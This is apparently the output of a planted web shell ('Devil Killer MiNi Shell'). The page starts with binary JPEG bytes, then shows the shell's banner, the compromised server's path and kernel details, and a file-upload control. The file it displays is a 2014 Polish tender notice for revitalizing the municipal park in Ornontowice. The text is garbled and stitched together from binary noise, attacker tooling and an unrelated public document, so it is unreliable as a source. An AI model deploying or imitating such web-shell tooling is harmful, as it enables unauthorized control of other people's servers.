JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140313/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140313/84762-N-2014.html

<p class="kh_header"><b>Ornontowice: Wykonanie w formule zaprojektuj i wybuduj zadania pn.: Rewitalizacja obiektu - Park Gminny w Ornontowicach, realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet VI. Zrównoważony rozwój miast Działanie 6.2. Rewitalizacja obszarów zdegradowanych Poddziałanie 6.2.2. Rewitalizacja - małe miasta.</b><br>
<b>Numer ogłoszenia: 84762 - 2014; data zamieszczenia: 13.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ornontowice , ul. Zwycięstwa 26a, 43-178 Ornontowice, woj. śląskie, tel. 32 3306222, faks 32 3306215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ornontowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.ornontowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie w formule zaprojektuj i wybuduj zadania pn.: Rewitalizacja obiektu - Park Gminny w Ornontowicach, realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet VI. Zrównoważony rozwój miast Działanie 6.2. Rewitalizacja obszarów zdegradowanych Poddziałanie 6.2.2. Rewitalizacja - małe miasta..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rzeczowa realizacja etapu II, III i IV w ramach projektu pn.: Rewitalizacja obiektu - Park Gminny w Ornontowicach, realizowana w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet VI. Zrównoważony rozwój miast Działanie 6.2. Rewitalizacja obszarów zdegradowanych Poddziałanie 6.2.2. Rewitalizacja - małe miasta. 
Zadanie przygotowywane jest w oparciu o formułę zaprojektuj i wybuduj.
UWAGA! Wszelkie prace na terenie parku podlegają szczegółowym uzgodnieniom z konserwatorem zabytków.Wszystkie prace powinny być poprzedzone badaniami terenu (aktualizacja pomiaru geodezyjnego).Założenia programowe:  1. Podkreślenie wartości historycznych i kulturowych parku.2. Wykorzystanie potencjału przyrodniczego parku.3. Wprowadzenie funkcji dydaktycznych i rekreacyjnych.4. Umożliwienie organizowania imprez kulturalnych.5. Uwydatnienie punktów widokowych parku.6. Stworzenie  korzystnych  warunków  siedliskowych  dla  licznych  gatunków  lokalnej  fauny i flory.7. Zapewnienie bezpieczeństwa na terenie parku.
8. Stworzenie funkcjonalnego układu komunikacyjnego.Szczegółowe właściwości funkcjonalne: Powierzchnia parku ok. - 4,2ha. Powierzchnia w zakresie opracowania podzielona na etapy - łącznie ok. 2,63ha ETAP II - 8393m2 ETAP III - 9970m2 
ETAP IV - 7982m2. Zadanie obejmuje wykonanie następujących części:1. Prace projektowe (aktualizacja mapy, wykonanie badań terenowych, inwentaryzacja zieleni, wykonanie projektu architektonicznego, wykonanie projektu zieleni, uzyskanie uzgodnień, opinii i pozwoleń wymaganych do rozpoczęcia prac w terenie).2. Prace przygotowawcze (wygrodzenie placu oraz zaplecza budowy, wycinka, karczowanie i wywóz samosiejek).3. Realizacja zadania szczegółowo opisana poniżej (oddzielnie dla każdego z etapów):ETAP II obejmuje:1. Amfiteatr oraz stała scena w formie muszli koncertowej - w trzeciej niecce osuszonego stawu należy zaprojektować oraz wykonać amfiteatr wraz z zadaszoną sceną i zapleczem. Obiekt powinien być przystosowany dla osób niepełnosprawnych. Wewnątrz niecki biegnie ciek wodny, który w projekcie zostaje zakryty kratką pomostową. Zjazd na poziom następuje z grobli, po której poprowadzono drogę tzw. bezpieczeństwa.Amfiteatr - ukształtowanie terenu, wykonanie murków-siedzisk - 415mb, montaż ławek.
Wykonanie murków oporowych okalających ciek wodny 2x60m - 120mb.Wyłożenie cieku wodnego kamieniem łamanym na warstwie betonu - 150m2.Krata stalowa lub żeliwna do przykrycia cieku wodnego wraz ze stelażem (szer. 2m) - 60 mb.Wymagania dotyczące projektu sceny i amfiteatru: Projekt powinien opierać się na założeniach koncepcyjnych zawartych w PFU jako załącznik. Zakres projektu powinien obejmować wszelkie rysunki, opisy i niezbędne opracowania zapewniające prawidłowe wykonanie dokumentacji zgodne z obowiązującymi w tym zakresie przepisami prawa. Projekt powinien również zawierać wizualizacje obiektu.Wymagania dotyczące budowy sceny i amfiteatru:Należy przewidzieć przyłącze energii elektrycznej dla potrzeb organizacji imprez kulturalnych. Plac pod  scenę  powinien  być  utwardzony,  a  parametry  podbudowy  muszą  uwzględniać przejazdy ciężkiego sprzętu. Scena powinna być drewniana, o wymiarach ok. 100m2, wysokości 10m, zadaszenie w formie muszli koncertowej (łupiny) oparte na konstrukcji z drewna klejonego powinno być wykonane ze szkła lub poliwęglanu. Przyjęte rozwiązanie wymaga akceptacji Inwestora. Siedziska widowni powinny być wykonane z drewna impregnowanego, zamocowane trwale do betonowych murków (beton estetyczny, gładki) - powierzchnia utwardzona między widownią a sceną.Kolejnym elementem jest wykonanie zaplecza, które powinno uwzględnić następujące funkcje: a) reżyserka,
b) garderoba dla artystów - jako pomieszczenie ze ścianą mobilną,c) magazyn,d) toaleta dla artystów ze zbiornikiem bezodpływowym, e) obiekt powinien być wyposażony w wszelką infrastrukturę niezbędną do prawidłowego funkcjonowania (prąd, woda, Internet),f) powierzchnia zabudowy zaplecza: ok. 50 m2.2. Nawierzchnie pozostałe - nawierzchnie poszczególnych alejek oraz drogi pożarowej zostały określone w PFU.Wymagania dotyczące nawierzchni:
Nawierzchnie powinny odpowiadać Polskim Normom oraz zgodne z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie przede wszystkim w zakresie szerokości i nośności drogi pożarowej, odpowiednia struktura nawierzchni ścieżki dla koni. Prace ziemne należy wykonywać ze szczególnym zwróceniem uwagi na bezpieczeństwo korzeni drzew rosnących w pobliżu.Uwaga. Projektowany układ komunikacyjny, określony w PFU obejmuje również wykonanie stosownej nawierzchni dla małej architektury (ławki, kosze na śmieci i kramy zostaną zakupione w oddzielnym postępowaniu).Korytowanie pod wszystkie nawierzchnie ok. 40cm - 2252m2.Wykonanie pochylni na drodze pożarowej 126m2 - 110m3.
Skarpa pod widownię - 620m3.Złagodzenie skarpy przy parku i podniesienie wypłaszczenia 156+701 - 857m3.Podbudowy pod nawierzchnie, nawierzchnie (kamień/kostka granitowa) + krawężnik/obrzeże granitowy surowo łupany wraz z podbudową:Podbudowa górna, dolna oraz warstwa odsączająca - 2252m2.
Wykonanie nawierzchni Terraway - 400m2. Wykonanie nawierzchni utwardzonej (kamień naturalny) - 622m2.Nawierzchnia alejek (kamienna) - 262m2.
Nawierzchnia dla drogi pożarowej (kamienna) - 823m2.Nawierzchnia dla ruchu konnego - 145m2.3. Nasadzenia - zgodnie z PFU nasadzenia obejmują drzewa, krzewy, a także byliny i rośliny cebulowe oraz trawnik. W związku z koniecznością pielęgnacji nowych nasadzeń zieleni oraz trawników konieczne jest doprowadzenie przyłącza wody do parku. Punkty, w których można pobrać wodę muszą być rozmieszczone w odpowiednich odległościach (ustalone z Inwestorem), by zapewnić możliwość swobodnego podłączenia węży do podlewania lub możliwość instalacji systemu nawodnienia.Nasadzenia:Drzewa (4x w szkółce przesadzane, mocno rozgałęzione), Świdośliwa Lamarcka (Amelanchier lamarckii) - 2szt.Krzewy (w kontenerach o poj. C3), Dereń kanadyjski (Cornus canadensis) (6szt./1m2) - 81m2; Golteria pełzająca (Gaultheria procumbens) - 5m2.1(GTrawnik siany - 5755 m2.
4. Oświetlenie.Oprócz wykonywanego w oddzielnym zamówieniu oświetlenia Parku Gminnego należy zaprojektować oraz wykonać oświetlenie dekoracyjne eksponujące niektóre okazy drzew oraz potoku przy projektowanym amfiteatrze wraz ze sceną  i zapleczem. Projekt oświetlenia powinien odpowiadać Polskim Normom odnośnie natężenia i wszelkich innych parametrów. 5. Ogrodzenie.Jednym z elementów przedmiotowego zadania jest ogrodzenie  terenu  parku od północno-wschodniej strony ogrodzeniem systemowym panelowym, zabezpieczonym antykorozyjnie  poprzez  m.in. ocynkowanie  oraz  malowanie proszkowe  lakierem.  W  ogrodzeniu  w określonych  przez  Inwestora  miejscach  powinny znaleźć  się  furtki.  Ogrodzenie  należy poprowadzić od  narożnika ogrodzenia oczyszczalni ścieków sąsiadującej z parkiem do narożnika muru otaczającego stary cmentarz na długości (dla etapu II) 100 m.ETAP III obejmuje:1. Plac zabaw z labiryntem. Labirynt prowadzący do placu zabaw z elementami roślinnymi oraz zabawkami dla małych dzieci proponuje się wykonać jako kombinację przesłon stworzonych z roślin żywopłotowych oraz zabawek dla małych dzieci. Wszystkie wybrane elementy placu zabaw są zbudowane prawie całkowicie z drewna, w celu jak najlepszego dopasowania do naturalistycznego stylu całego parku. Wszystkie urządzenia zabawowe powinny posiadać atesty, certyfikaty oraz spełniać wszystkie niezbędne wymogi bezpieczeństwa. Zostaną wykonane w standardowych rozmiarach dla poszczególnych grup wiekowych, zgodnie z danymi katalogowymi (wybór zabawek zostanie uzgodniony  z Inwestorem). Powinny one również być dopasowane stylem do charakteru parku (z uwzględnieniem wskazówek Śląskiego Wojewódzkiego Konserwatora Zabytków w Katowicach). Urządzenia zabawowe powinny spełniać wymogi norm PN-EN 1176-1-11:2009P Wyposażenie placów zabaw i nawierzchnie, natomiast nawierzchnie powinny spełniać wymagania normy PN-EN 1177:2009P Nawierzchnie placów zabaw amortyzujące upadki. Nawierzchnie zastosowane na placu zabaw powinny być wykonane częściowo z piasku a częściowo jako nawierzchnia bezpieczna syntetyczna. Zestaw elementów na placu zabaw będzie przystosowany dla dzieci w różnych kategoriach wiekowych. Elementy powinny wyróżniać się, tematycznie nawiązując się do jakiegoś motywu przewodniego (np. motyw statku piratów - nawiązanie do stawów paciorkowych wchodzących w skład założenia pałacowo-parkowego  w Ornontowicach)Przykładowe urządzenia placu zabaw: - zatopiona łódź skomponowana z drzewami oznaczonymi na planie - dziób statku z masztem - 1szt.-   linarium dla dzieci starszych zlokalizowane we wschodniej części placu zabaw, w nawiązaniu do stołów do gry oraz szachów terenowych - 1 szt.- piaskownica dla dzieci młodszych zlokalizowana w zachodniej części placu zabaw, w pobliżu labiryntu, w nawiązaniu do znajdujących się w labiryncie pozostałych zabawek dla dzieci młodszych - 1szt.Przykładowe zabawki:
- stolik do zabawy z piaskiem i wodą - 1szt.- tablica do pisania kredą - 1szt.,
- kamień przepowiadający pogodę - 1szt.- bujaki - 2szt.- zabawka dźwiękowa - telegraf akustyczny - do rozmowy na odległość - 1szt.Na terenie parku  należy również umieścić 3 granitowe stoliki (wraz z siedziskami) z planszami do gier o wymiarach 1x1m (szachy/warcaby, chińczyk, młynek lub 3 inne), a także szachownicę w poziomie gruntu, do gry w tzw. żywe szachy o wymiarach 23-25m2 (długość 1 pola powinna wynosić ok. 60cm).2. Plac Aniołów Stróżów. Na wzniesieniu położonym blisko wejścia do parku od strony północno-zachodniej należy ustawić rzeźbę Anioła Stróża wykonanego z drewna, zwróconego twarzą w stronę placu zabaw. Minimalna wysokość postaci Anioła Stróża to 2,5m. Postać  Anioła  otoczono zielenią. Kompozycja będzie urozmaicona nasadzeniami narcyzów i tulipanów. Cały placyk z rzeźbą należy otoczyć formowanym żywopłotem z cisu, dzięki czemu uzyskamy zamknięty, przytulny zakątek. 3. Nawierzchnie pozostałe - nawierzchnie zostały określone w PFU. Obejmują wykonanie nawierzchni bezpiecznej wraz z podbudową i krawężnikiem gumowym na placu zabaw, kamienia łamanego na Placu Aniołów Stróżów oraz kostki granitowej jako nawierzchni labiryntu.Wymagania dotyczące nawierzchni:Nawierzchnie powinny odpowiadać Polskim Normom oraz zgodne z Rozporządzeniem Ministra Transportu  i Gospodarki Morskiej z dnia 2 marca 1999r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie przede wszystkim w zakresie szerokości i nośności drogi pożarowej, odpowiednia struktura nawierzchni ścieżki dla koni. Prace ziemne należy wykonywać ze szczególnym zwróceniem uwagi na bezpieczeństwo korzeni drzew rosnących        w pobliżu.Uwaga. Projektowany układ komunikacyjny, określony w PFU obejmuje również wykonanie stosownej nawierzchni dla małej architektury (ławki i kramy zostaną zakupione w oddzielnym postępowaniu).Roboty ziemne z przemieszczaniem mas ziemnych:Korytowanie pod wszystkimi nawierzchniami utwardzonymi ok.30cm - 1095m2.Podbudowy pod nawierzchnie, nawierzchnie + krawężnik granitowy surowo łupany wraz z podbudową:Podbudowa górna, dolna, warstwa odsączająca - 1095m2.
Nawierzchnia bezpieczna syntetyczna - 45m2. Nawierzchnia bezpieczna - piasek - 480mb.Nawierzchnia na placu Anioła Stróża (kamień łamany) - 42m2.
Nawierzchnia labiryntu - 80mb.Schody terenowe o dł. biegu 8,2m, szer. biegu 2m - 20m2.Nawierzchnia alei głównej (kamienna) wraz z krawężnikiem/obrzeżem granitowym - 388m2. Nawierzchnia pozostałych alejek (kamienna) wraz z krawężnikiem/obrzeżem granitowym - 520m2.4. Nasadzenia - zgodnie z PFU nasadzenia obejmują drzewa, krzewy, a także byliny i rośliny cebulowe oraz trawnik.
W związku z koniecznością pielęgnacji nowych nasadzeń zieleni oraz trawników konieczne jest doprowadzenie przyłącza wody do parku. Punkty, w których można pobrać wodę muszą być rozmieszczone w odpowiednich odległościach (ustalone z Inwestorem), by zapewnić możliwość swobodnego podłączenia węży do podlewania lub możliwość instalacji systemu nawodnienia.Nasadzenia:Drzewa (4x w szkółce przesadzane, mocno rozgałęzione):Świdośliwa Lamarcka (Amelanchier lamarckii) - 9szt.Wiśnia japońska Kanzan (Prunus serrulata Kanzan) - 10 szt.Jabłoń Royalty (Malus Royalty) - 3 szt.Jabłoń Profusion - (Jabłoń Profusion) - 5 szt.Kasztan jadalny - (Castanea sativa) - 1 szt.Tulipanowiec amerykański - (Liriodendron tulipfera) - 1 szt.Bukszpanowe, krzewy okrywowe:Cis pospolity (Taxus baccata) - żywopłot 7szt/m2 - 29,5m2.Antropurpurea) - 9szt./m2 - 4,3m2.
Bukszpan wieczniezielony (Buxus sempervirens) śr. 60cm - 6 szt. Bluszcz pospolity (Hedera helix) - krzew okrywowy - 9szt. /m2 - 9,7m2.Dereń kanadyjski (Comus canadensis) + Karmnik oscity (Sagina sugulata) - krzew okrywowy-11sz./m2 - 3,3m2.
Nasadzenia na placu zabaw:Żywopłot wzdłuż labiryntu - ligustr (9szt./m2) 35,5m2 - 72 mb.Nasadzenia przy rondku:Golteria pełzająca (Gaultheria procumbens) - 12szt./m2 - 12,5m2.Azalia Orlice (Rhododendron Orlice) - 6szt./1m2 - 52m2.
Krzewy:(Philadelphus hybrida Virginal) - 5szt./m2 - 56m2 Dereń kanadyjski (Cornus canadensis)-7-8szt./m2 - 132m2 Rośliny cebulowe:Rośliny cebulowe (12szt./m2) - 688m2Trawnik siany - 7696m2. ETAP IV obejmuje:1. Grill terenowy stacjonarny. W części północno-wschodniej parku zlokalizowano miejsce do organizowania grilli. Prowadzi do niego ścieżka żwirowa, a plac na którym umiejscowiony zostanie grill stacjonarny zostanie wyłożony brukiem. Grill okrągły o min. średnicy zewnętrznej 1.5m. Należy przewidzieć trwałe zainstalowanie kratki do grillowania o min średnicy 0.9m oraz wykończenie brzegów pozwalające na zastosowanie jako stół.
2. Nasadzenia - zgodnie z PFU nasadzenia obejmują drzewa, krzewy, a także byliny i rośliny cebulowe oraz trawnik.W związku z koniecznością pielęgnacji nowych nasadzeń zieleni oraz trawników konieczne jest doprowadzenie przyłącza wody do parku. Punkty, w których można pobrać wodę muszą być rozmieszczone w odpowiednich odległościach (ustalone z Inwestorem), by zapewnić możliwość swobodnego podłączenia węży do podlewania lub możliwość instalacji systemu nawodnienia.Nasadzenia rozgałęzione:Wiśnia japońska Kanzan (Prunus serrulata Kanzan) - 11 szt. 
Świdośliwa Lamarcka (Amelanchier lamarckii) - 6 szt. Wiąz Camperdownii (Ulmus Camperdownii) - 1 szt. Jabłoń Profusion (Jabłoń Profusion) - 11 szt. 
Wierzba płacząca Tristis (Salix alba Tristis) - 1 szt. Nasadzenia przy grillu:
Lilak Meyera (Syringa meyeri Palibin)-5-6 szt./1m2 - 25,5 m2
Nasadzenie przy zakątku lilaków -5szt./1m2
Lilak Meyera (Syringa meyeri Palibin),Lilak pospolity Katherine Havemeyer (Syringa vulgaris Katherine Havemeyer) - 270,5 m2 Tawuła brzozolistna (Spirea betulifoilia)-5 szt./1m2 - 87 m2 Pozostałe nasadzenia:Dereń kanadyjski (Corn canadensis)-7-8szt./1m2 - 75m2 Forsycja pośrednia (Forsythia intermedia), Jaśminowiec mieszańcowy Belle Etoile (Philadelphus hybrida Belle Etoile), Jaśminowiec mieszańcowy Virginal (Philadelphus hybrida Virginal),Zylistek mieszańcowy Strawberry fields (Deutzia hybrida Strawberry Fields), Tawuła brzozolistna (Spirea betulifoilia)-5szt./1m2 - 210 m2 Rośliny cebulowe:Rośliny cebulowe (12szt./1m2) - 295,5 m2 .Trawnik siany - 6 204 m2 3. Nawierzchnie pozostałe - nawierzchnie poszczególnych alejek oraz miejsca do grillowania zostały określone w PFU. Wymagania dotyczące nawierzchni:Nawierzchnie powinny odpowiadać Polskim Normom oraz zgodne z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie przede wszystkim w zakresie szerokości i nośności drogi pożarowej, odpowiednia struktura nawierzchni ścieżki dla koni. Prace ziemne należy wykonywać ze szczególnym zwróceniem uwagi na bezpieczeństwo korzeni drzew rosnących  w pobliżu.Uwaga. Projektowany układ komunikacyjny, określony w PFU obejmuje również wykonanie stosownej nawierzchni dla małej architektury (ławki i kramy zostaną zakupione w oddzielnym postępowaniu).Roboty ziemne z przemieszczaniem mas ziemnych:Korytowanie pod wszystkie nawierzchnie ok. 30 cm - 815 m2 Podbudowy pod nawierzchnie, nawierzchnie (kamień/kostka granitowa) + krawężnik/obrzeże granitowy surowo łupany wraz z podbudową:Podbudowa górna, dolna, warstwa odsączająca - 815 m2 Nawierzchnia do jazdy konnej i prowadząca do grilla - 485 m2 Nawierzchnia utwardzona (kamienna) - 246 m2 Wykonanie pochylni - 44m2 Utwardzenie placu na grill wraz z podbudową - 40 m2 4. Oświetlenie.
Oprócz wykonywanego w oddzielnym zamówieniu oświetlenia Parku Gminnego należy zaprojektować oraz wykonać oświetlenie dekoracyjne eksponujące niektóre okazy drzew oraz potoku przy projektowanym amfiteatrze wraz ze sceną  i zapleczem. Projekt oświetlenia powinien odpowiadać Polskim Normom odnośnie natężenia i wszelkich innych parametrów. 5. Ogrodzenie.Jednym z elementów przedmiotowego zadania jest ogrodzenie terenu parku od północno-wschodniej strony ogrodzeniem systemowym panelowym, zabezpieczonym antykorozyjnie  poprzez  m.in.ocynkowanie  oraz  malowanie proszkowe lakierem.  W  ogrodzeniu w określonych  przez Inwestora miejscach powinny znaleźć się furtki. Ogrodzenie należy poprowadzić od  narożnika ogrodzenia oczyszczalni ścieków sąsiadującej z parkiem do narożnika muru otaczającego stary cmentarz na długości (dla etapu IV) 160 m. Na terenie parku zostaną wykonane także (w oddzielnym zamówieniu) tablice informacyjne odnośnie oryginalnych gatunków występujących drzew, tablica z regulaminem parku, tablica informująca o wszelkich przedsięwzięciach kulturalnych i sportowych, plan parku oraz drogowskazy. W związku z powyższym w przedmiotowym zamówieniu należy ująć w/w elementy w koncepcji zagospodarowania terenu z podaniem propozycji lokalizacji, jednakże bez ich wykonania. Roboty budowlane będą prowadzone równolegle do innych prac budowlanych (realizowanych w ramach oddzielnego zamówienia zgodnie z ustawą Prawo zamówień publicznych), obejmujących  wykonanie oświetlenia. Wszyscy Wykonawcy uzgodnią oraz skorelują swoje prace w taki sposób, aby wzajemnie nie utrudniali sobie zakresu swojej pracy.
Na terenie parku zostaną zasadzone drzewa, krzewy, byliny i rośliny cebulowe. W przypadku ich nie ukorzenienia (uschnięcie, wyginięcie, zamarznięcie itp.) należy  uwzględnić ich wymianę  bądź uzupełnienie brakujących gatunków na nowe w okresie gwarancji.Projekt winien zawierać - każdy etap oddzielnie:4 egz. projektu budowlanego wraz z uzgodnieniami branżowymi oraz prawomocną decyzją o pozwolenie na budowę, zgodnie z aktualnymi przepisami w tym zakresie - decyzja  o pozwolenie na budowę jedna dla całości zadania.4 egz. projektu wykonawczego wraz z kosztorysem inwestorskim (2 egz.) i przedmiarem robót (2 egz.)  z uwzględnieniem oznaczenia zakresu robót za pomocą kodu CPV, zgodnie z aktualnymi przepisami w tym zakresie.1 egz. specyfikacji technicznej wykonania i odbioru robót budowlanych.
Dokumentację w całości należy złożyć w wersji papierowej i elektronicznej na nośniku magnetycznym lub optycznym. Wszystkie egzemplarze projektu winny być oryginałami z czytelnym naniesieniem rozwiązań projektowych, jak   i uzbrojenia podziemnego (barwne oznakowanie elementów). Wszelkie kolizje uzbrojenia muszą posiadać indywidualne rozwiązanie projektowe w formie tekstowej oraz rysunkowej. 
UWAGA! Wszelkie prace na terenie parku podlegają szczegółowym uzgodnieniom z konserwatorem zabytków. Projekt winien być uzgodniony i zaopiniowany przez konserwatora zabytków.Obowiązkiem projektanta jest również uzyskanie wszelkich koniecznych dokumentów (mapy, wypisy). Oferent zobowiązany jest do przygotowania podkładów geodezyjnych. 	Projektant będzie uczestniczył w co 2-tygodniowych spotkaniach w siedzibie Urzędu Gminy lub na terenie obiektu, których celem będzie omówienie rozwiązań projektowych oraz ocena postępu prac. Z chwilą rozpoczęcia robót budowlanych co tydzień na placu budowy będą się odbywały tzw. Rady Budowy, na których Wykonawcy będą przedstawiali postęp wykonanych prac.Po wykonaniu zadania Wykonawca przygotuje inwentaryzację geodezyjną powykonawczą.Wszelkie wskazane z nazwy materiały (wyroby) należy rozumieć, jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że w przypadku wskazanych z nazwy materiałów i wyrobów Zamawiający dopuszcza zastosowanie równoważnych materiałów (wyrobów) nie gorszej jakości niż opisane. Ciężar udowodnienia, że materiał ( wyrób) jest równoważny w stosunku do wyrobu określonego przez Zamawiającego, spoczywa na Wykonawcy.Szczegółową charakterystykę  przedmiotu zamówienia stanowią Załączniki:Załącznik nr  8 do SIWZ - Program funkcjonalno -  użytkowy 
Załącznik nr  9 do SIWZ - Koncepcja zagospodarowania Parku Gminnego w Ornontowicach - Plan Załącznik nr 10 do SIWZ - Koncepcja zagospodarowania Parku Gminnego w Ornontowicach - Tereny zielni  i rekreacji.Załącznik nr  11 do SIWZ - Dokumentacja fotograficzna.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 45.00.00.00-7, 45.10.00.00-8, 45.30.00.00-0, 45.40.00.00-1, 45.11.27.10-5, 45.11.27.11-2, 45.21.20.00-6, 45.23.31.61-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.06.2015.</p>
